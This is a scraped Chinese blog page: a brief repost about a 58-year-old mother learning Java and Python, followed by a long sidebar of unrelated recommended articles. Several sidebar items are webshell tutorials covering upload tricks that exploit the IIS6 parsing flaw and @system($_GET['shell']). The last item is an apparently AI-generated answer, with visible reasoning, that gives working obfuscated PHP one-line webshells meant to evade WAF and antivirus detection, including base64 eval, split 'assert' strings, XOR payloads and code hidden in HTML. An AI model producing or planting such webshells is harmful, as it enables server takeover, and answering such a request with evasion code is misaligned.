一句话，但不转不行

最新推荐文章于 2025-09-08 22:44:31 发布

最新推荐文章于 2025-09-08 22:44:31 发布 · 75 阅读

文章标签：

#Python #Google #C #C++ #C#

摘自@TopLanguage上的讨论

虽然一般只发一定长度的帖子，但这个实在是不转不行啊～

wangleheng写道：

给个现实的例子。俺五十八岁的老母亲退休在家，这个月刚学会Java的SWT和JFace，现在开始摸Python，每天一两个小程序玩得不亦乐乎，她老人家说：“就是那么回事，搞明白基本的机制，剩下都是语法细节，用的时候到书上查，到网上Google就可以了”

这句话的上下文见“开始学习C++，我需要多少勇气”。

最后，我只想学Chandler说一句：

Having a maillist finally pays off!

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

iteye_11848

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

一句话木马拿Shell与菜刀原理

悦分享

07-12

2079

1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马，不行就加个空格或是利用IIS6.0解析漏洞，常见格式：1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马，居然被程序检测拦截了，右键记事本打开木马，在代码最前面加上gif89a，再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马，复制地址到数据库备份备份成asp格式木马，有时不成功的话，就利用IIs6.0解析漏洞，格式：1.asp;

Java小白入门200例84之Java对象类型转换向上转型和向下转型

编程界明世隐的博客

10-04

667

作者简介作者名：编程界明世隐简介：优快云博客专家，从事软件开发多年，精通Java、JavaScript，博主也是从零开始一步步把学习成长、深知学习和积累的重要性，喜欢跟广大ADC一起打野升级，欢迎您关注，期待与您一起学习、成长、起飞！引言很多Java初学者问我，新手明明很用心、很努力学习的Java知识，转头又忘记了，很让人犯愁，小白如何能够快速成长、成为大牛呢？其实要成为大神的技巧只有一个：“多学多练”，于是明哥就整理了比较典型的练习实例，通过练习能够快速提升编码技巧和熟练度，让你在成为大

参与评论您还未登录，请先登录后发表或查看评论

浅谈eval与assert一句话木马执行区别

m0_46467017的博客

07-23

2504

一句话木马就是只需要一行代码的木马，短短一行代码，就能做到和大马相当的功能。为了绕过waf的检测，一句话木马出现了无数中变形，但本质是不变的木马的函数执行了我们发送的命令。

基于php一句话木马的变种总结

Alexz__的博客

10-10

5291

说实话php我只是在w3c系统的看了30分钟，对不是3天30天3个小时是30分钟那我能不能说我花半个小时接通了一门计算机语言呢（逃需要记住的是：熟读PHP手册就会有不一样的发现贴上来的都是亲测能用 php5.4.45 apache phpstudy环境 $_GET函数数据来源的web响应木马 @system($_GET['shell']) @pass...

SQL注入一句话木马（load_file/out file）

初学者L_言的博客

11-26

9616

工具靶机——metasploitable2 环境——DVWA，（low等级下）菜刀——蚁剑权限查看查看mysql是否有对函数load_file(),outfile()函数的限制 (securefilepriv的值是否为NULL) show global variables like '%secure%'; NULL 表示不可用，空表示可用 ' order by 2-- 查看字段...

深入浅出玩转php一句话（含过waf新姿势）

wjy397的专栏

01-10

1万+

本帖最后由 sucppVK 于 2017-1-9 14:39 编辑一、前言本文原创作者：XXX，本文属i春秋原创奖励计划，未经许可禁止转载！各个论坛出了不少过waf的一句话可笔者见还是有不少小白没有理解一句话（只知道是拿来链接菜刀）今天打算做一篇面向初学者的教程，总结知识点，抛砖引玉。让小白从彻底理解马的含义，到打造属于自己过waf的马。 ----

利用动态二进制加密实现新型一句话木马之Java篇(转) 冰蝎

时光凉春衫薄的博客

07-16

6716

概述本系列文章重写了java、.net、php三个版本的一句话木马，可以解析并执行客户端传递过来的加密二进制流，并实现了相应的客户端工具。从而一劳永逸的绕过WAF或者其他网络防火墙的检测。本来是想把这三个版本写在一篇文章里，过程中发现篇幅太大，所以分成了四篇，分别是：利用动态二进制加密实现新型一句话木马之Java篇利用动态二进制加密实现新型一句话木马之.net篇利用动态二进制加密实现新...

英语-就这900句玩转口语-上

m0_73835569的博客

02-01

2万+

持续更新。。。在美国有很多种机票购买方式，最简单便捷的就是网上购买。像AA、United、Continental、Air China等航空公司的网站都可以进行网上购票。网上购票的好处是能大致浏览到一些航班信息。购票流程：购票注意事项：口语大放送：交流面对面（Conversation）：

Linux一句话精彩问答

北冥

03-30

1万+

进入“linux一句话精彩问答2009年04月16日PDF版下载”页面编者按：鉴于目前中国Linux的发展现状，90%以上的问题都可以用一句话来回答，这便是本文的初衷。欢迎大家添加自己的“一句话”，收录后注明原始提供者。更详细的文档，请浏览http://linux.chinaunix.net或http://www.linuxpk.com -----------------------

记一次奇怪的音画不同步问题（ts转mp4）

falseen的博客

09-16

5855

一、缘起最近在网上下载了一个 ts 格式的视频文件，使用播放器播放没有任何问题，传到 bilibili 后出现音画不同步的现象，具体表现为声音比画面快几秒。起初以为是 ts 格式的问题，于是决定转码试一下。然而问题并没有我想得那么简单... 二、使用ShanaEncoder 转码使用 ShanaEncoder 将文件转为 mp4 后，用播放器播放没有问题，传到B站后发现刚开始播放的时候是正常的，播放一分钟后就出现音画不同步的现象，暂停或拖动进度条后恢复正常。这实在是有点让人摸不着头脑。无奈之下

Android SurfaceView实战打造抽奖转盘

最新发布

seeyouintokyo的博客

09-08

740

强得有点不真实

PySimpleGUI 综合应用｜英语文本朗读以及转换为语音Mp3

汉阳Hann's Home

02-01

3723

When I was young, I'd listen to the radio, waiting for my favorite songs.｜当我还是个小女孩的时候，我常听着收音机，等待我最喜欢的歌。｜冰箱边、洗碗槽下，还有橱柜里面都有老鼠！I'm certain he'll go to see the film, because he's bought a ticket.｜我肯定他会去看电影的，因为他把票都买好了。

Unity 【Content Size Fitter】- 聊天气泡自动适配Text文本框大小

当代野生程序猿

02-25

6756

通常在展示人物对话的时候文本的长度是不定的，因此会需要动态的调整对话内容文本框的背景图片的大小，这里以如下这种气泡框的对话为例：实现该需求涉及到的内容包括Content Size Fitter组件的使用、2D Sprite工具包的使用。 Content Size Fitter组件用于Text文本框，如图所示，我们将Horzontal Fit设为Preferred Size，当我们调整Text文本框中的内容时，其大小会自动进行调整。注意Rect Transform中Pivot轴心点的设置

新唐NUC972 Linux（一）：USB烧写linux出厂镜像

小破孩的博客

02-20

3811

USB烧写出厂镜像文章目录USB烧写出厂镜像前言一、硬件连接二、安装驱动三、烧写linux程序四、运行程序前言今天开始进军linux，学了那么久单片机，也摸得七七八八，至少点个灯还是会的。本人之所以买酷客的linux开发板主要是便宜，资料也算齐全，虽然没有原子那么好，不过也够了，找那么多借口，其实就是qiong。今天先从USB烧录官方提供的linux相关程序到芯片开始吧。一、硬件连接 1、连接电源线 2、RS232转USB，需要安装CH340驱动，用于在电脑串口超级终端中查看调试信息。 3、U

WeChall CTF Writeup（一）

weixin_43211186的博客

02-25

1835

以下题目标题组成： [Score] [Title] [Author] 文章目录0x01 1 Training: Get Sourced by Gizmore0x02 1 Training: Stegano I by Gizmore0x03 1 Training: Crypto - Caesar I by Gizmore0x04 1 Training: WWW-Robots by Gizmore0x05 1 Training: ASCII by Gizmore 0x01 1 Training: Get Sou

C语言每日一练——第126天：佩奇借书问题

Edison's 小宇宙

02-25

2万+

史上最强借书方案问题讲解（代码详解+思路分析+动图演示+特性总结）

免杀SHELL一句话

03-28

<think>嗯，用户问的是如何实现免杀的一句话SHELL代码。首先，我需要回忆一下关于PHP一句话木马的基本知识。根据提供的引用，常见的免杀方法包括加密、字符串处理、混淆、特殊函数替换和格式变形。首先，静态免杀主要是绕过WAF的规则检测。比如，引用[1]提到使用加密或移位来隐藏关键词。比如用base64编码，或者异或运算来隐藏assert或eval这些敏感函数。例如，把$_POST['x']进行某种转换，再解密执行。这样WAF可能检测不到明文的关键词。然后，引用[2]和[4]都提到了eval和assert函数，这些是常见的危险函数，会被检测。所以替换这些函数也是一个方法，比如用create_function或者array_map等回调函数来间接执行代码。比如，把代码包装在一个匿名函数里，或者通过回调来触发。接下来，混淆和字符串处理。比如拆分字符串，把'assert'拆成'a'.'ss'.'ert'，或者用变量存储字符再拼接。引用中的示例用了substr和反转字符串的方法，这样避免直接出现敏感字符串。另外，格式变形也很重要，比如去掉<?php的闭合标签，或者使用短标签<?=，这样可以减少特征。引用[3]提到，常见的WAF会检查特定的文件结构，改变这些结构可以绕过检测。还要考虑动态执行的方式。比如使用$_REQUEST代替$_POST，或者通过其他超全局变量传递参数，增加检测的难度。同时，利用PHP的灵活语法，比如用可变变量$$a的方式，动态调用函数。可能还需要考虑编码和加密的层次，比如用base64_decode或者gzuncompress来处理 payload，这样在静态分析时，恶意代码是加密的，运行时才解密执行。例如，用base64编码后的字符串，然后在运行时解码并执行。此外，引用中的例子展示了如何使用特殊符号和注释来干扰检测工具。比如在代码中添加无用的字符串或注释，打乱代码的可读性，使得正则匹配失效。然后，需要综合这些方法，比如先加密payload，再通过字符串处理拼接关键函数，最后用不常见的函数来执行。例如，使用call_user_func配合动态生成的函数名，这样避免直接出现eval或assert。最后，测试生成的代码是否能被常见的安全工具检测到，如果不行，可能需要进一步调整混淆的方法。比如换一种加密方式，或者增加更多的干扰代码。总结起来，步骤大致是：替换敏感函数，加密或编码关键部分，字符串混淆，格式变形，使用回调或动态函数，以及添加干扰符号。这样组合多种方法可以提高免杀的效果。</think>### 如何实现免杀的一句话SHELL代码？ PHP一句话木马的免杀核心是**隐藏或混淆敏感函数/参数**，并通过语法变形绕过安全检测规则。以下是具体实现方法： --- #### 1. **基础免杀：字符串混淆与编码** - **敏感函数拆分**：将`eval`、`assert`等函数通过字符串拼接或编码隐藏： ```php <?php $a = "as"."sert"; // 拼接字符串 $a($_POST['x']); // 最终执行assert($_POST['x']) ?> ``` - **Base64编码**：对执行内容进行编码： ```php <?php @eval(base64_decode($_POST['z'])); // POST参数z传递Base64编码的指令 ?> ``` --- #### 2. **动态函数调用与回调** - **利用回调函数**：通过`call_user_func`或`array_map`间接调用危险函数： ```php <?php call_user_func('as'.'sert', $_POST['cmd']); ?> ``` - **可变变量**：使用`$$`动态生成函数名： ```php <?php $f = 'assert'; $f($_REQUEST['x']); ?> ``` --- #### 3. **特殊符号与注释干扰** - **插入无效代码**：添加干扰符号或注释破坏正则匹配： ```php <?php /*#@!^*/@eval(/*混淆*/$_GET['a']); ?> ``` - **十六进制/Unicode编码**： ```php <?php $a = "\x61\x73\x73\x65\x72\x74"; // assert的十六进制表示 $a($_POST['x']); ?> ``` --- #### 4. **高级混淆：加密与类封装** - **异或加密**：通过异或运算生成加密代码： ```php <?php $k = "KEY"; $t = base64_decode("加密后的Payload"); $c = $k ^ $t; eval($c); ?> ``` - **类方法封装**：将执行逻辑隐藏在类中： ```php <?php class Shell { public static function run($code) { return eval($code); } } Shell::run($_POST['c']); ?> ``` --- #### 5. **绕过文件特征检测** - **省略闭合标签**：避免`<?php ?>`的完整结构： ```php <? @eval($_POST['x']); ``` - **伪装为HTML**：混合HTML标签降低可疑性： ```php <div style="display:none;"> <?php @eval($_GET['c']); ?> </div> ``` --- ### 示例代码（综合应用） ```php <?php $f = substr("aXNY", 0, 2) . strrev("tressa"); // 动态生成"assert" $c = base64_decode($_POST['data']); $f($c); ``` --- ### 引用说明 1. 静态免杀主要通过加密或字符串操作隐藏关键词，如`assert`的拆分和拼接[^1]。 2. 回调函数（如`call_user_func`）可间接调用危险函数，降低代码可读性[^2]。 3. 通过十六进制或Unicode编码可绕过基于正则表达式的检测[^3]。 4. 类封装和混合HTML标签能有效伪装恶意代码[^4]。 ---